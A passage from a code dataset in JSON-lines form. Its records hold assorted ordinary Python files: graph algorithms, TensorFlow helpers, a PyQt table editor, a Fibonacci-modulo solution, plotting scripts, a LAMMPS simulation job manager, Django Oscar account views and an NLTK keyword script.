file.write(\"BFS: \" + str(bfs) + \"\\n\")\n## file.close()\n\n rlist = [1,11,6,7,10,15,3,4]\n for i in range(20):\n if i in rlist:\n graph.add_node(i)\n\n graph.add_edge(1, 11, 5)\n graph.add_edge(1, 10, 3)\n graph.add_edge(1, 3, 2)\n graph.add_edge(11, 6, 1)\n graph.add_edge(11, 10, 1)\n graph.add_edge(10, 15, 3)\n graph.add_edge(10, 3, 1)\n graph.add_edge(10, 4, 2)\n graph.add_edge(6, 15, 1)\n graph.add_edge(6, 7, 9)\n graph.add_edge(15, 4, 1)\n graph.add_edge(15, 7, 19)\n graph.add_edge(4, 7, 10)\n graph.add_edge(3, 10, 1)\n graph.add_edge(3, 4, 4)\n\n graph.dijkstra(1, 7)\n\n \n\n","sub_path":"JackBond15.py","file_name":"JackBond15.py","file_ext":"py","file_size_in_byte":6174,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"254070346","text":"import tensorflow as tf\nimport numpy as np\n\nREG_VARS = 'reg_vars'\n\n\ndef linear(X, dout, name, bias=True):\n with tf.variable_scope(name):\n dX = int(X.get_shape()[-1])\n W = tf.get_variable('W', shape=(dX, dout))\n tf.add_to_collection(REG_VARS, W)\n if bias:\n b = tf.get_variable('b', initializer=tf.constant(np.zeros(dout).astype(np.float32)))\n else:\n b = 0\n return tf.matmul(X, W) + b\n\n\ndef relu_layer(X, dout, name):\n return tf.nn.relu(linear(X, dout, name))\n\n\ndef get_session_config():\n session_config = tf.ConfigProto()\n session_config.gpu_options.allow_growth = True\n return session_config\n","sub_path":"inverse_rl/models/tf_util.py","file_name":"tf_util.py","file_ext":"py","file_size_in_byte":667,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"127715139","text":"# Copyright © 2020 baneon - MIT License\n# See `LICENSE` included in the source distribution for details.\n\nimport sys\nimport pathlib\n\nfrom PyQt5 import QtWidgets, QtGui\nfrom PyQt5.QtCore import pyqtSlot, Qt, QVariant\n\nfrom gui.MainWindow import Ui_MainWindow\nfrom gui.ItemEdit import Ui_Dialog\n\n\n# === AlignCenterText ===\nclass AlignDelegate(QtWidgets.QStyledItemDelegate):\n\n def initStyleOption(self, option, index):\n super(AlignDelegate, self).initStyleOption(option, index)\n option.displayAlignment = Qt.AlignCenter\n# === AlignCenterText ===\n\n\nclass Dialog(QtWidgets.QDialog):\n\n def __init__(self):\n super(Dialog, self).__init__()\n self.ui = Ui_Dialog()\n self.ui.setupUi(self)\n\n\nclass main(QtWidgets.QMainWindow):\n\n def __init__(self):\n super(main, self).__init__()\n self.ui = Ui_MainWindow()\n self.ui.setupUi(self)\n\n for row in range(self.ui.tableWidget.rowCount()):\n for col in range(self.ui.tableWidget.columnCount()):\n self.ui.tableWidget.setItem(row, col, QtWidgets.QTableWidgetItem(None))\n item = QtWidgets.QTableWidgetItem()\n item.setData(Qt.EditRole, QVariant(row + 1))\n item.setFlags(Qt.ItemIsEnabled)\n self.ui.tableWidget.setItem(row, 0, item)\n\n item = QtWidgets.QTableWidgetItem()\n self.ui.tableWidget.setHorizontalHeaderItem(0, item)\n item = self.ui.tableWidget.horizontalHeaderItem(0)\n item.setText(\"ID\")\n\n # === AlignCenterText ===\n delegate = AlignDelegate(self.ui.tableWidget)\n self.ui.tableWidget.setItemDelegate(delegate)\n # === AlignCenterText ===\n\n # Acomoda el ancho de las columnas.\n self.ui.tableWidget.resizeColumnsToContents()\n\n self.ui.actionSave.triggered[\"bool\"].connect(self.openFileSaveDialog)\n self.ui.actionEditItem.triggered[\"bool\"].connect(self.openDialog)\n self.ui.tableWidget.cellChanged[\"int\", \"int\"].connect(self.get_tableWidget_values)\n\n\n @pyqtSlot(bool)\n def openFileSaveDialog(self, q):\n title = \"Guardar Archivo\"\n accept = \"Documento de Evaluación (*.digna)\"\n files, _ = QtWidgets.QFileDialog.getSaveFileName(self, title, \"\", accept)\n print(files, _)\n\n\n @pyqtSlot(bool)\n def openDialog(self, q):\n myDialog = Dialog()\n myDialog.exec()\n\n\n @pyqtSlot(int, int)\n def get_tableWidget_values(self, x, y):\n self.ui.tableWidget.resizeColumnsToContents()\n print(x, y)\n print(self.ui.tableWidget.item(x, y).text())\n\n\nif __name__ == \"__main__\":\n app = QtWidgets.QApplication(sys.argv)\n application = main()\n application.show()\n sys.exit(app.exec())\n","sub_path":"Digna/Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":2725,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"558340030","text":"# Uses python3\r\n\"\"\"This is the solution for problem of computing huge Fibonacci number modulo m.\r\nThe thing here is that we have to solve the problem when the n and m are\r\nvery big (n <= 10^18, m <= 10^5). Thus, the idea of this solution is \r\nto use Pisano period and its property, that the current element of\r\nthe period is equal to sum of previous two elements modulo m.\"\"\"\r\n\r\nimport sys\r\n\r\n\r\ndef calc_fib(number):\r\n if number <= 1:\r\n return number\r\n else:\r\n fib_list = []\r\n fib_list.extend([0, 1])\r\n for j in range(2, number + 1):\r\n fib_list.append(fib_list[j - 1] + fib_list[j - 2])\r\n fib_list[j - 2] = 0\r\n return fib_list[j]\r\n\r\n\r\ndef get_fibonacci_huge(el_number, divsr_m):\r\n pis_list = [0, 1]\r\n for i in range(2, divsr_m ** 2 + 1):\r\n pis_list.append((pis_list[0] % divsr_m + pis_list[1] % divsr_m) % divsr_m)\r\n pis_list.pop(0)\r\n print(pis_list)\r\n if pis_list == [0, 1]:\r\n period = i - 1\r\n break\r\n answer = calc_fib(el_number % period) % divsr_m\r\n return answer\r\n\r\n\r\nif __name__ == '__main__':\r\n input = sys.stdin.read()\r\n n, m = map(int, input.split())\r\n print(get_fibonacci_huge(n, m))\r\n","sub_path":"fibonacci_huge_final.py","file_name":"fibonacci_huge_final.py","file_ext":"py","file_size_in_byte":1228,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"479611326","text":"import sys\nimport os\nimport matplotlib as mpl\nimport matplotlib.pyplot as plt\nfrom pylab import *\n\ntxX = r_[-612.5, -612.5, 612.5, 612.5]-25\ntxY = r_[12.5, -612.5, -612.5, 12.5]-12.5\n\nblk = mpl.patches.Rectangle((-100,-100), 200, 200, color='0.5')\nblk.set_lw(0)\n\nblk2 = mpl.patches.Rectangle((-250,-150), 100, 200, color='0.8')\nblk2.set_lw(0)\n\nblk3 = mpl.patches.Rectangle((-500, 200), 800, 100, color='0.8')\nblk3.set_lw(0)\n\nblk4 = mpl.patches.Rectangle((150,-400), 150, 250, color='0.8')\nblk4.set_lw(0)\n\n\nx, y = meshgrid(r_[-600:600:50], r_[-587.5:587.5:50]-12.5)\nfig1 = plt.figure(figsize=(3.33, 3.33))\nfig1.subplots_adjust(bottom=0.05, top=1.0, left=0.17, right=.93)\nax = fig1.add_subplot(111)\nax.plot(txX, txY, color='k', ls='-', label='Tx Wire')\n\nax.add_patch(blk)\nax.add_patch(blk2)\nax.add_patch(blk3)\nax.add_patch(blk4)\n\nax.set_xlabel(\"Easting (m)\")\nax.set_ylabel(\"Northing (m)\")\nax.plot(x, y, marker='.', color='black', markersize=2, linestyle='None')\nplt.xlim(-900, 900)\nplt.ylim(-900, 900)\nax.set_aspect('equal')\n\nfig1.canvas.draw()\n\nfname = '../figs/gradLayout.eps'\nplt.savefig(fname, format='eps')\nos.system(\"open \" + fname)\n","sub_path":"phdThesisDave/phdThesis/ReducedAppend/figureCode/gradientLayout.py","file_name":"gradientLayout.py","file_ext":"py","file_size_in_byte":1137,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"311591043","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\nimport sys\nimport os\n\nsys.path.insert(0, os.path.abspath(\n os.path.join(os.path.dirname(__file__), '..', \"src\")))\n\nimport python_homie4 as homie # noqa: E402\n\nmqtt_settings = {\n \"MQTT_BROKER\": os.getenv(\"mqtt_broker\", \"localhost\"),\n \"MQTT_PORT\": int(os.getenv(\"mqtq_port\", 1883)),\n}\n\n__all__ = (\n homie,\n mqtt_settings,\n)\n","sub_path":"tests/context.py","file_name":"context.py","file_ext":"py","file_size_in_byte":386,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"529569446","text":"import sqlite3\n\nwith sqlite3.connect(\"new.db\") as connection:\n c = connection.cursor()\n \n print(\"Original Data:\")\n c.execute(\"SELECT * FROM population\")\n oRows = c.fetchall()\n\n for row in oRows:\n print(row)\n\n c.execute(\"UPDATE population SET population = 9000000 \\\n WHERE city = 'New York City'\")\n\n c.execute(\"DELETE FROM population WHERE city = 'Boston'\")\n\n print(\"New Data:\")\n\n c.execute(\"SELECT * FROM population\")\n nRows = c.fetchall()\n\n for row in nRows:\n print(row)\n","sub_path":"sqlg.py","file_name":"sqlg.py","file_ext":"py","file_size_in_byte":529,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"411606206","text":"import os\nfrom lammps import lammps\nimport LammpsTools as lmp\nimport LammpsJobSave as lmpJobSave\nimport lmpWriter as l_writer\nimport config\nimport fifo\nimport misc.time as tm\nimport tempfile as temp\n\nclass Job(object):\n\n def __init__(self, config_path):\n super(Job, self).__init__()\n self.config = self.read_config(config_path)\n \n self.config.sim_path['sim_list'] = os.path.join(self.config.sim_path['root'], 'sim.list')\n open(self.config.sim_path['sim_list'], 'a').close()\n if self.config.sim_parameter['local'] == 1:\n self._switch_to_local()\n else:\n self.config.lmp_path['local_root'] = self.config.lmp_path['root']\n self.config.lmp_path['fifo'] = temp.mkdtemp()\n\n def read_config(self, path):\n return config.JobConfig(path)\n\n def _create_fifos(self):\n fifo = {}\n for name, data in self.config.fifo.items():\n if name == 'distance_fifo':\n fifo[name] = DistanceFifo(self, data['path'], data['script'], data['out'], data['stepsize'])\n elif name == 'traj_compression':\n fifo[name] = TrajCompressionFifo(self, data['path'], data['script'], data['out'], data['stepsize'])\n else:\n raise NotImplementedError('this fifo based postproduction is not yet implemented.')\n return fifo\n\n def setup_env(self):\n self.env = lmp.Environment(self.config.sim_path['config'])\n # Protein\n self.protein_creator = lmp.ProteinCreator(self.env, self.config.sim_path['protein'])\n self.protein = self.protein_creator.create()\n self.protein_creator.change_to_res_based(self.protein)\n # Polymer\n if 'named_sequence' in self.config.sim_parameter:\n self.polymer_creator = lmp.PolymerCreator(self.env, self.config.sim_parameter['named_sequence'], mode='cycle')\n else:\n self.polymer_creator = lmp.PolymerCreator(self.env, \n self.config.sim_parameter['monomers'], weights=self.config.sim_parameter['weights'], \n length=self.config.sim_parameter['poly_length'])\n self.poly = self.polymer_creator.create()\n\n self.sim = lmp.EnvManipulator(self.env, auto_repulsion=False)\n self.sim.create_random_start_positions()\n self.setup_writer = l_writer.LmpWriter(self.env)\n\n # Update Lammps Parameters\n self.config.sim_parameter['named_sequence'] = [particle.type_.name for particle in self.poly.data['particles']]\n self.config.sim_parameter['id_sequence'] = [particle.type_.Id for particle in self.poly.data['particles']]\n as_data = self.sim.activeSiteParticles(self.protein, self.config.sim_path['active_site'])\n self.config.sim_parameter['active_site'] = {'xyz': map(int, as_data['xyz']), \n 'chain': map(str, as_data['chain']), \n 'pdb_id': map(int, as_data['pdb_id']), \n 'iCode': map(str, as_data['iCode'])}\n self.config.lmp_parameter['active_site_ids'] = self.config.sim_parameter['active_site']['xyz']\n self.config.lmp_parameter['monomer_ids'] = self._get_monomer_ids()\n self.config.save()\n # fifos can only be created if the monomer ids are known\n self.fifo = self._create_fifos()\n\n\n def terminate_fifos(self):\n for name, fifo in self.fifo.items():\n fifo.terminate()\n\n def setup_job_save(self):\n self.compactor = lmpJobSave.JobSave(self.config.sim_path['root'])\n\n def save(self):\n self.compactor.save()\n self.compactor.save_versions(lmp_version=lammps().version(),\n lmp_tool_hash=lmp.__git_hash__)\n self.compactor._db.close()\n\n def clean_up(self):\n self.compactor.clean_up()\n\n def lmps_run(self, Id, parameters, paths, fifos={}):\n self._start_fifo_capture(Id)\n lammps_sim = lammps()\n # submitting parameters\n for name, val in parameters.items():\n # lists are converted to strings\n if isinstance(val, list):\n val = ' '.join(map(str, val))\n lammps_sim.command('variable %s string \"%s\"'% (name,val))\n # submitting paths\n for name, path in paths.items():\n lammps_sim.command('variable %s string \"%s\"'% (name, path))\n # submitting run Id\n lammps_sim.command('variable num string %05d'% Id)\n # starting script\n lammps_sim.file(paths['script'])\n # specify fifo dumps\n for name,fifo in self.fifo.items():\n lammps_sim.command(fifo.lammps_string())\n lammps_sim.command('run ${time_steps}')\n # write snapshot of end-comformation\n lammps_sim.command('write_dump solid xyz ${end_xyz}.xyz')\n lammps_sim.close()\n # report completed simulation so restarting jobs will know\n # also, it notes the machine and folder, so scattered info can be retrieved\n self._mark_complete(Id)\n\n def generate_new_sim(self, index):\n # Create new Start Conditions\n self.sim.create_random_start_positions()\n # Create New Setup File\n self.setup_writer.write('%s/%05d' % (self.config.lmp_path['input'], index))\n\n def run(self):\n start_idx = self._get_last_uncompleted_index()\n end_idx = self.config.sim_parameter['sampling_rate']\n # check if simulations is already completed\n if start_idx == -1:\n return \n for i in xrange(start_idx, end_idx):\n self.generate_new_sim(i)\n # start next LAMMPS run\n self.lmps_run(i, self.config.lmp_parameter, self.config.lmp_path, fifos=self.fifo)\n # mark job as completed\n if start_idx != -1:\n self._mark_complete(-1)\n self.terminate_fifos()\n\n def create_local_env(self, local_dir='/data/ohl/'):\n '''\n '''\n name_comp = self.config.sim_path['root'].split('/')[-3:]\n if name_comp[1] == 'jobs':\n del name_comp[1]\n else:\n del name_comp[0]\n folder_name = '-'.join(name_comp)\n local_folder = os.path.join(local_dir, folder_name)\n if not os.path.exists(local_folder):\n os.mkdir(local_folder)\n local_input_folder = os.path.join(local_folder, 'input')\n if not os.path.exists(local_input_folder):\n os.mkdir(local_input_folder)\n local_output_folder = os.path.join(local_folder, 'output')\n if not os.path.exists(local_output_folder):\n os.mkdir(local_output_folder)\n local_fifo_folder = os.path.join(local_folder, 'fifo')\n if not os.path.exists(local_fifo_folder):\n os.mkdir(local_fifo_folder)\n new_paths = {'local_root': local_folder,\n 'input': local_input_folder, \n 'output': local_output_folder,\n 'fifo': local_fifo_folder}\n return new_paths\n\n def _get_last_uncompleted_index(self):\n '''get the last line of the sim_list file \n and return the index.\n '''\n with open(self.config.sim_path['sim_list']) as f:\n completed_sims = f.read().split('\\n')\n if len(completed_sims) > 1:\n last_line = completed_sims[-2]\n else:\n return 0\n return int(last_line[:5])\n\n def _switch_to_local(self):\n '''if the data of the simulations \n are to be stored locally, the lmp paths \n are changed accordinly.\n '''\n new_paths = self.create_local_env()\n self.config.lmp_path.update(new_paths)\n\n def _mark_complete(self, index):\n if self.config.sim_parameter['local'] == 1:\n path = self.config.lmp_path['local_root']\n else:\n path = self.config.lmp_path['root']\n with open(self.config.sim_path['sim_list'], 'a') as f:\n info = '%05d;%s;%s;%s\\n' % (index, localhost(), path, tm.time_string())\n f.write(info)\n\n def _start_fifo_capture(self, index):\n for name, fifo in self.fifo.items():\n fifo.activate(index)\n\n def _get_monomer_ids(self):\n monomer_ids = set([p.type_.Id for p in self.poly.data['particles']])\n return sorted(monomer_ids) \n\n\nclass TrajCompressionFifo(fifo.FiFo):\n '''This class feeds the output of LAMMPS to \n the python script that calculates the distance between \n the polymer and the active site.\n '''\n def __init__(self, job, fifo_name, script, file_name, steps_size=100):\n self.parent = job\n fifo_path = self.generate_path(fifo_name)\n super(TrajCompressionFifo, self).__init__(fifo_path, script, file_name, steps_size)\n self.args = self.additional_arguments()\n\n def generate_path(self, file_name):\n '''fifo files should reside in the fifo folder.\n '''\n if 'fifo' in self.parent.config.lmp_path:\n fifo_folder = self.parent.config.lmp_path['fifo']\n else:\n fifo_folder = self.create_temp_folder()\n return os.path.join(fifo_folder, file_name)\n\n def additional_arguments(self):\n '''The monomer IDs are needed to be able to discern\n between active site and polymer.\n '''\n return ' '\n\n def output_path(self, index):\n file_name = '%s%05d.xyz.gz' % (self.out_file, index)\n return os.path.join(self.parent.config.lmp_path['output'], file_name)\n\n def lammps_string(self):\n return 'dump fifo_traj solid xyz %d \"%s\"' % (self.step_size, self.fifo_path)\n\n\nclass DistanceFifo(fifo.FiFo):\n '''This class feeds the output of LAMMPS to \n the python script that calculates the distance between \n the polymer and the active site.\n '''\n def __init__(self, job, fifo_name, script, file_name, steps_size=100):\n self.parent = job\n fifo_path = self.generate_path(fifo_name)\n super(DistanceFifo, self).__init__(fifo_path, script, file_name, steps_size)\n self.args = self.additional_arguments()\n\n def generate_path(self, file_name):\n '''fifo files should reside in the fifo folder.\n '''\n if 'fifo' in self.parent.config.lmp_path:\n fifo_folder = self.parent.config.lmp_path['fifo']\n else:\n fifo_folder = self.create_temp_folder()\n return os.path.join(fifo_folder, file_name)\n\n def additional_arguments(self):\n '''The monomer IDs are needed to be able to discern\n between active site and polymer.\n '''\n return '-'.join(map(str, self.parent.config.lmp_parameter['monomer_ids']))\n\n def lammps_string(self):\n return 'dump fifo_distance distance_group xyz %d \"%s\"' % (self.step_size, self.fifo_path)\n\n def output_path(self, index):\n file_name = '%s%05d' % (self.out_file, index)\n return os.path.join(self.parent.config.lmp_path['output'], file_name)\n\ndef localhost():\n return os.uname()[1]\n","sub_path":"Tools/job.py","file_name":"job.py","file_ext":"py","file_size_in_byte":11006,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"384042131","text":"\n\"\"\"\nSet up the plot figures, axes, and items to be done for each frame.\n\nThis module is imported by the plotting routines and then the\nfunction setplot is called to set the plot parameters.\n\n\"\"\"\n\nfrom pyclaw.geotools import topotools\nfrom pyclaw.data import Data\nimport dclaw.dplot as cd\n#import pdb\n\nfrom pyclaw.plotters import colormaps, geoplot\nfrom numpy import linspace\nimport dclaw.dplot as local_dplot\n\n#--------------------------\ndef setplot(plotdata):\n#--------------------------\n\n \"\"\"\n Specify what is to be plotted at each frame.\n Input: plotdata, an instance of pyclaw.plotters.data.ClawPlotData.\n Output: a modified version of plotdata.\n\n \"\"\"\n\n\n from pyclaw.plotters import colormaps, geoplot\n from numpy import linspace\n import dclaw.dplot as local_dplot\n\n\n plotdata.clearfigures() # clear any old figures,axes,items data\n\n def fixup(current_data):\n t = current_data.t\n import pylab\n import matplotlib\n import matplotlib.pyplot as pplt\n pylab.title('')\n xticktuple = ('75','80','85','90','95','100','105','110','115','120')\n pylab.xticks(linspace(75,120,10),xticktuple,fontsize=32)\n #pylab.xlabel('Downslope distance from gate (m)',fontsize=32)\n pylab.yticks([],())\n #pylab.yticks([-5,-3,-1,1,3,5,7],('-6','-4','-2','0','2','4','6'),fontsize=18)\n pylab.axis('equal')\n #pylab.grid()\n #a = pplt.gca()\n #cgrid = a.grid\n #cgrid(which='major',axis='x',linewidth=0.25,color='0.75')\n #print lines\n #pdb.set_trace()\n #pplt.getp()\n pplt.gcf().subplots_adjust(left=0.0,bottom=0.15,right=1.0,top=1.0,wspace = 0.0,hspace=0.0)\n #pylab.tight_layout(0.0,0.0)\n pylab.xlim(74,122)\n pylab.ylim(-4.0,6.0)\n\n\n figkwargs = dict(figsize=(48*.3,11*.3/.85),dpi=1600)\n #-----------------------------------------\n # Figure for pcolor plot\n #-----------------------------------------\n plotfigure = plotdata.new_plotfigure(name='pcolor', figno=0)\n plotfigure.show = True\n plotfigure.kwargs = figkwargs\n # Set up for axes in this figure:\n plotaxes = plotfigure.new_plotaxes('pcolor')\n plotaxes.afteraxes = fixup\n plotaxes.title = ''\n\n\n # Debris\n plotitem = plotaxes.new_plotitem(plot_type='2d_pcolor')\n plotitem.plot_var = geoplot.depth\n plotitem.pcolor_cmap = local_dplot.flume_colormap\n plotitem.pcolor_cmin = 0.0\n plotitem.pcolor_cmax = 0.18\n plotitem.add_colorbar = False\n plotitem.amr_gridlines_show = [0,0,0,0,0]\n plotitem.gridedges_show = 0\n\n\n # Land\n plotitem = plotaxes.new_plotitem(plot_type='2d_pcolor')\n plotitem.plot_var = local_dplot.land\n plotitem.pcolor_cmap = local_dplot.runoutpad_colormap\n plotitem.pcolor_cmin = 0.0\n plotitem.pcolor_cmax = 0.1\n plotitem.add_colorbar = False\n plotitem.amr_gridlines_show = [1,1,0,0,0]\n plotitem.kwargs = {'linewidths':0.001}\n plotitem.gridedges_show = 0\n\n\n # add contour lines of depth if desired\n plotitem = plotaxes.new_plotitem(plot_type='2d_contour')\n plotitem.show = True\n plotitem.plot_var = geoplot.depth\n plotitem.contour_levels = linspace(0.0,0.18,10)\n plotitem.amr_contour_colors = ['k'] # color on each level\n plotitem.kwargs = {'linestyles':'solid','linewidths':1}\n plotitem.amr_contour_show = [0,0,1,1,0]\n #plotitem.gridlines_show = [1,1,0,0,0,0]\n #plotitem.gridedges_show = 0\n\n\n #-----------------------------------------\n\n # Parameters used only when creating html and/or latex hardcopy\n # e.g., via pyclaw.plotters.frametools.printframes:\n\n plotdata.printfigs = True # print figures\n plotdata.print_format = 'png' # file format\n plotdata.print_framenos = 'all' # range(70,190,10) # list of frames to print\n plotdata.print_gaugenos = 'all' # list of gauges to print\n plotdata.print_fignos = 'all' # list of figures to print\n plotdata.html = True # create html files of plots?\n plotdata.html_homelink = '../README.html' # pointer for top of index\n plotdata.latex = True # create latex file of plots?\n plotdata.latex_figsperline = 2 # layout of plots\n plotdata.latex_framesperline = 1 # layout of plots\n plotdata.latex_makepdf = False # also run pdflatex?\n\n return plotdata\n\n","sub_path":"USGSFlume/gate_release_example/setplot.py","file_name":"setplot.py","file_ext":"py","file_size_in_byte":4399,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"518471149","text":"import urlparse\n\nfrom django.shortcuts import get_object_or_404\nfrom django.views.generic import TemplateView, ListView, DetailView, CreateView, UpdateView, DeleteView\nfrom django.core.urlresolvers import reverse\nfrom django.http import HttpResponseRedirect\nfrom django.contrib import messages\nfrom django.utils.translation import ugettext as _\nfrom django.contrib.auth import authenticate, login as auth_login\nfrom django.contrib.sites.models import get_current_site\nfrom django.conf import settings\nfrom django.db.models import get_model\n\nfrom oscar.apps.address.forms import UserAddressForm\nfrom oscar.views.generic import PostActionMixin\nfrom oscar.apps.customer.forms import EmailAuthenticationForm, EmailUserCreationForm\nfrom oscar.core.loading import import_module\nimport_module('customer.utils', ['Dispatcher'], locals())\n\norder_model = get_model('order', 'Order')\norder_line_model = get_model('order', 'Line')\nbasket_model = get_model('basket', 'Basket')\nuser_address_model = get_model('address', 'UserAddress')\nemail_model = get_model('customer', 'email')\ncommunicationtype_model = get_model('customer', 'communicationeventtype')\n\n\nclass AccountSummaryView(ListView):\n \"\"\"Customer order history\"\"\"\n context_object_name = \"orders\"\n template_name = 'customer/profile.html'\n paginate_by = 20\n model = order_model\n\n def get_queryset(self):\n \"\"\"Return a customer's orders\"\"\"\n return self.model._default_manager.filter(user=self.request.user)[0:5]\n \n \nclass AccountAuthView(TemplateView):\n template_name = 'customer/login_registration.html'\n redirect_field_name = 'next'\n login_prefix = 'login'\n registration_prefix = 'registration'\n communication_type_code = 'REGISTRATION'\n \n def get_logged_in_redirect(self):\n return reverse('customer:summary')\n \n def get_context_data(self, *args, **kwargs):\n context = super(AccountAuthView, self).get_context_data(*args, **kwargs)\n redirect_to = self.request.REQUEST.get(self.redirect_field_name, '')\n context[self.redirect_field_name] = redirect_to\n context['login_form'] = EmailAuthenticationForm(prefix=self.login_prefix)\n context['registration_form'] = EmailUserCreationForm(prefix=self.registration_prefix) \n return context\n \n def check_redirect(self, context):\n redirect_to = context.get(self.redirect_field_name)\n \n netloc = urlparse.urlparse(redirect_to)[1]\n if not redirect_to:\n redirect_to = settings.LOGIN_REDIRECT_URL\n elif netloc and netloc != self.request.get_host():\n redirect_to = settings.LOGIN_REDIRECT_URL\n return redirect_to\n \n def send_registration_email(self, user):\n code = self.communication_type_code\n ctx = {'user': user,\n 'site': get_current_site(self.request)}\n try:\n event_type = communicationtype_model.objects.get(code=code)\n except communicationtype_model.DoesNotExist:\n # No event in database, attempt to find templates for this type\n messages = communicationtype_model.objects.get_and_render(code, ctx)\n else:\n # Create order event\n messages = event_type.get_messages(ctx)\n\n if messages and messages['body']: \n dispatcher = Dispatcher()\n dispatcher.dispatch_user_messages(user, messages)\n \n def get(self, request, *args, **kwargs):\n context = self.get_context_data(*args, **kwargs)\n \n if request.user.is_authenticated():\n return HttpResponseRedirect(self.get_logged_in_redirect())\n\n self.request.session.set_test_cookie()\n return self.render_to_response(context)\n \n def post(self, request, *args, **kwargs):\n context = self.get_context_data(*args, **kwargs)\n redirect_to = self.check_redirect(context)\n \n if u'login_submit' in self.request.POST:\n login_form = EmailAuthenticationForm(prefix=self.login_prefix, data=request.POST) \n if login_form.is_valid():\n auth_login(request, login_form.get_user())\n if request.session.test_cookie_worked():\n request.session.delete_test_cookie()\n return HttpResponseRedirect(redirect_to)\n context['login_form'] = login_form\n\n if u'registration_submit' in self.request.POST:\n registration_form = EmailUserCreationForm(prefix=self.registration_prefix, data=request.POST)\n context['registration_form'] = registration_form\n if registration_form.is_valid():\n user = registration_form.save()\n \n if getattr(settings, 'OSCAR_SEND_REGISTRATION_EMAIL', True):\n self.send_registration_email(user)\n \n user = authenticate(username=user.email, password=registration_form.cleaned_data['password1'])\n auth_login(self.request, user)\n if self.request.session.test_cookie_worked():\n self.request.session.delete_test_cookie() \n return HttpResponseRedirect(redirect_to)\n \n self.request.session.set_test_cookie()\n return self.render_to_response(context)\n\n \nclass EmailHistoryView(ListView):\n \"\"\"Customer email history\"\"\"\n context_object_name = \"emails\"\n template_name = 'customer/email-history.html'\n paginate_by = 20\n\n def get_queryset(self):\n \"\"\"Return a customer's orders\"\"\"\n return email_model._default_manager.filter(user=self.request.user)\n\n\nclass EmailDetailView(DetailView):\n \"\"\"Customer order details\"\"\"\n template_name = \"customer/email.html\"\n context_object_name = 'email'\n \n def get_object(self):\n \"\"\"Return an order object or 404\"\"\"\n return get_object_or_404(email_model, user=self.request.user, id=self.kwargs['email_id'])\n\n\nclass OrderHistoryView(ListView):\n \"\"\"Customer order history\"\"\"\n context_object_name = \"orders\"\n template_name = 'customer/order-history.html'\n paginate_by = 20\n model = order_model\n\n def get_queryset(self):\n \"\"\"Return a customer's orders\"\"\"\n return self.model._default_manager.filter(user=self.request.user)\n\n\nclass OrderDetailView(DetailView):\n \"\"\"Customer order details\"\"\"\n model = order_model\n \n def get_template_names(self):\n return [\"customer/order.html\"] \n\n def get_object(self):\n return get_object_or_404(self.model, user=self.request.user, number=self.kwargs['order_number'])\n\n\nclass OrderLineView(DetailView, PostActionMixin):\n \"\"\"Customer order line\"\"\"\n \n def get_object(self):\n \"\"\"Return an order object or 404\"\"\"\n order = get_object_or_404(order_model, user=self.request.user, number=self.kwargs['order_number'])\n return order.lines.get(id=self.kwargs['line_id'])\n \n def do_reorder(self, line):\n if not line.product:\n messages.info(self.request, _(\"This product is no longer available for re-order\"))\n return\n \n # We need to pass response to the get_or_create... method\n # as a new basket might need to be created\n self.response = HttpResponseRedirect(reverse('basket:summary'))\n basket = self.request.basket\n \n # Convert line attributes into basket options\n options = []\n for attribute in line.attributes.all():\n if attribute.option:\n options.append({'option': attribute.option, 'value': attribute.value})\n basket.add_product(line.product, 1, options)\n messages.info(self.request, \"Line reordered\") \n\n\nclass AddressListView(ListView):\n \"\"\"Customer address book\"\"\"\n context_object_name = \"addresses\"\n template_name = 'customer/address-book.html'\n paginate_by = 40\n \n def get_queryset(self):\n \"\"\"Return a customer's addresses\"\"\"\n return user_address_model._default_manager.filter(user=self.request.user)\n\n\nclass AddressCreateView(CreateView):\n form_class = UserAddressForm\n mode = user_address_model\n \n def form_valid(self, form):\n self.object = form.save(commit=False)\n self.object.user = self.request.user\n self.object.save()\n return HttpResponseRedirect(self.get_success_url())\n\n def get_template_names(self):\n return [\"customer/address-create.html\"]\n\n def get_success_url(self):\n return reverse('customer:address-list')\n\n\nclass AddressUpdateView(UpdateView):\n form_class = UserAddressForm\n model = user_address_model\n \n def get_queryset(self):\n \"\"\"Return a customer's addresses\"\"\"\n return user_address_model._default_manager.filter(user=self.request.user) \n\n def get_template_names(self):\n return [\"customer/address-form.html\"]\n \n def get_success_url(self):\n return reverse('customer:address-detail', kwargs={'pk': self.get_object().pk })\n\n\nclass AddressDeleteView(DeleteView):\n model = user_address_model\n\n def get_queryset(self):\n \"\"\"Return a customer's addresses\"\"\"\n return user_address_model._default_manager.filter(user=self.request.user) \n\n def get_success_url(self):\n return reverse('customer:address-list') \n \n def get_template_names(self):\n return [\"customer/address-delete.html\"]\n","sub_path":"oscar/apps/customer/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":9392,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"626925843","text":"import nltk\nimport os\nimport string\nfrom nltk.tokenize import sent_tokenize, word_tokenize\nfrom nltk.corpus import stopwords, state_union\nfrom nltk.stem import PorterStemmer\nfrom nltk.probability import FreqDist\n\n#get input text \ndirpath = os.getcwd() + \"/Job Summary.txt\"\ndata = state_union.raw(dirpath)\n\n#initialize utilities\nlemma = nltk.wordnet.WordNetLemmatizer()\nps=PorterStemmer()\nstop_words = set(stopwords.words(\"english\"))\nmystop_words=[\"\\'ll\",\"position\",\"work\",\"job\",\"role\",\"year\",\"valley\",\"skill\",\"day\",\"summary\",\"must\",\"salary\",'ready','great','enriched','include','top','position','500','fortune','large','set','include','reasonable','providing','decent','like','using','along',]\njobDesStopWords=stop_words.union(mystop_words)\n\nweighedKeyWords = 